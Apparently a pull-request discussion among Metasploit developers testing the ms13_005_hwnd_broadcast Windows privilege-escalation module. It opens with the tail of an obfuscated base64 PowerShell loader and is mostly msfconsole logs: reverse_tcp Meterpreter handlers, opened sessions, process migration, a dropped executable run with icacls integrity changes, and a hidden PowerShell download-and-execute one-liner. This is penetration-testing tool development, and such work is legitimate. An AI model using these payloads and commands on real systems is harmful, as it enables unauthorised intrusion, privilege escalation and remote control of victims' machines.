IALwA1AE4AZAA1AFUAZgBWAFUASgA4AGYATABWADgAdAB0AEYAMABSAEgANwBOAFUASgBFAGUAagBvADkAUgBpAHUARgB3ACsAaABQAEYAegAvADUAdgA4AHQARQA5AEsAMQA0AEkARwBYAGcATwBtAHAANgBlAGwAWQA3AEEAOAAzADIALwBIAGIAbAB4AEQAOQBDAGgAbQA3AEIAMQByADEAWABkAEIAdgBDAHMAZgBpAGkAVwBpAHUAaQBFAGMAMgB6AGYAOAAxAHoAeQB5AFMAOABaAHUAKwBPADEANwBoAEQAVABmAHYAawBmAEkATQA0ADMAdgBzAGQAcgBrAEkAbwA2AEQANgBSACsARgBwAEkALwBrAHYAZQBIAHcATQBZAGgAdABLAHoAaQBWAHgAKwBJADAAdwBJAHUATQBkAHMAWQA0AGkARgBTAGUAVwBmAEgAeQA4AFAAYQB0AHEAagBHAHcAZQBEAEsAegBBAHUASwA0AFcATgBXADIAeABhAGsAegBWAEcAdwBUAHMARgBJACsAUwBYAEcAUwBIAFkAVwBuADcASABEADEATwBuAHgANAArAFAAdABpAEgAdAA1AEUANwBsAGgAVQBWAHEAWgAwAEoANQBBAHoAcQBGADQATQBoAFAAMwBtAFYAdQBKAGwAMwBKADMASgBkADQAcgBKAEgAMQByADkANQBjAFAAZwA1AGUAYgBMADAAegAvAEoAKwBIAGwAVwBTAFcAVABYAHUAWAA0AHIAMgBPADcAYQA0AFcARgBmACsAcQB1AHIAbQA2AFQANwBMAC8AMwB4AHIATgBvAD0AJwApACkAKQA7ACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkAEIAeQB0AGUAKAApAHwATwB1AHQALQBOAHUAbABsADsAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAQgB5AHQAZQAoACkAfABPAHUAdAAtAE4AdQBsAGwAOwAkACgASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACQAcwB0AHIAZQBhAG0ALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQA7AA== ';$si.UseShellExecute = $false;$si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden';$si.CreateNoWindow = $True;$p = [System.Diagnostics.Process]::Start($si);"

Interrupt: use the 'exit' command to quit
msf exploit(ms13_005_hwnd_broadcast) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(ms13_005_hwnd_broadcast) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.172
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.172:49160) at 2013-07-29 09:55:43 -0500

meterpreter > 
meterpreter > background
[*] Backgrounding session 3...

So, maybe, is the exploit handler / task finishing before the payload "can be delivered" by using the TYPE technique. Is it working on your tests @Meatballs1 ?

Thanks!

juan

[Meatballs1]

Ah last thing I tried was windows/exec CMD=calc.exe as it would be quicker than Meterpreter. I guess this issue should be resolved the same route that is decided for #2156

[jvazquez-r7]

@Meatballs1 agree with your last comment, trying with windows/exec CMD=calc.exe

[Meatballs1]

Bah that reverted more than I wanted to! I've got myself into a gitloopofdoom(tm)

[Meatballs1]

Ok cleaned out my PSH changes. Is there an executive design decision on how to handle 'indefinite' waits? I would like to see about speeding this up with railgun multicall but it seems completely unfunctional at the moment. The alternative would be to hardcode a meterpreter method that takes a string and HWND_BROADCASTS it all for you :)

[jvazquez-r7]

Is there an executive design decision on how to handle 'indefinite' waits?

Not atm afaik.

I'm still trying the windows/exec payload .... taking the live again to deliver the CMD. I really don't thing the TYPE option with powershell encoded payload is very useful atm, but still likes the custom command option, so testing. If calc.exe spawns it's okey for me to land. I just will add a warning message to show when people use the TYPE exploitation method. It takes longer time than I thought indeed.

[jvazquez-r7]

Okey, fisnished and works, testing "old" methods, adding a warning message when using the TYPE technique with a payload, and proceeding with landing if all work as expected :)

[jvazquez-r7]

FILE Method tested successfully, now giving a chance to the WEB one:

msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Stopping existing job...
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Trying to drop payload to C:\Users\JUANVA~1\AppData\Local\Temp\Low...
[+] Payload dropped successfully, exploiting...
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
cd C:\Users\JUANVA~1\AppData\Local\Temp\Low && icacls berXmO.exe /setintegritylevel medium && berXmO.exe
[*] Executing command...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:51228) at 2013-07-29 11:30:04 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:51228) processing InitialAutoRunScript 'migrate -f'
[*] Waiting 0s before file cleanup...
[!] This exploit may require manual cleanup of: berXmO.exe
[*] Current server process: berXmO.exe (612)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1880
[+] Successfully migrated to process 

[jvazquez-r7]

Also the WEB one:

msf exploit(ms13_005_hwnd_broadcast) > set TECHNIQUE WEB
TECHNIQUE => WEB
msf exploit(ms13_005_hwnd_broadcast) > set SESSION 3
SESSION => 3
msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Using URL: http://0.0.0.0:8080/edMRTA
[*]  Local IP: http://10.6.0.165:8080/edMRTA
[*] Server started.
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
powershell.exe -w hidden -nop -ep bypass -c IEX ((new-object net.webclient).downloadstring('http://10.6.0.165:8080/edMRTA'))
[*] Executing command...
[*] 10.6.0.165       ms13_005_hwnd_broadcast - Delivering Payload
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:51276) at 2013-07-29 11:40:02 -0500
[*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:51276) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (2892)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 568
[+] Successfully migrated to process 

Thanks @Meatballs1 , landing!

[jvazquez-r7]

Landed, just small cleanup here: 3a05993

warning message about long wait times for the user, and make msftidy compliang, thanks @Meatballs1 for an awesome exploit!

[Meatballs1]

For completeness the easter egg I wanted:

http://www.youtube.com/watch?v=yYmg7YX-YY0 :)

Cheers for putting up with all my dithering @jvazquez-r7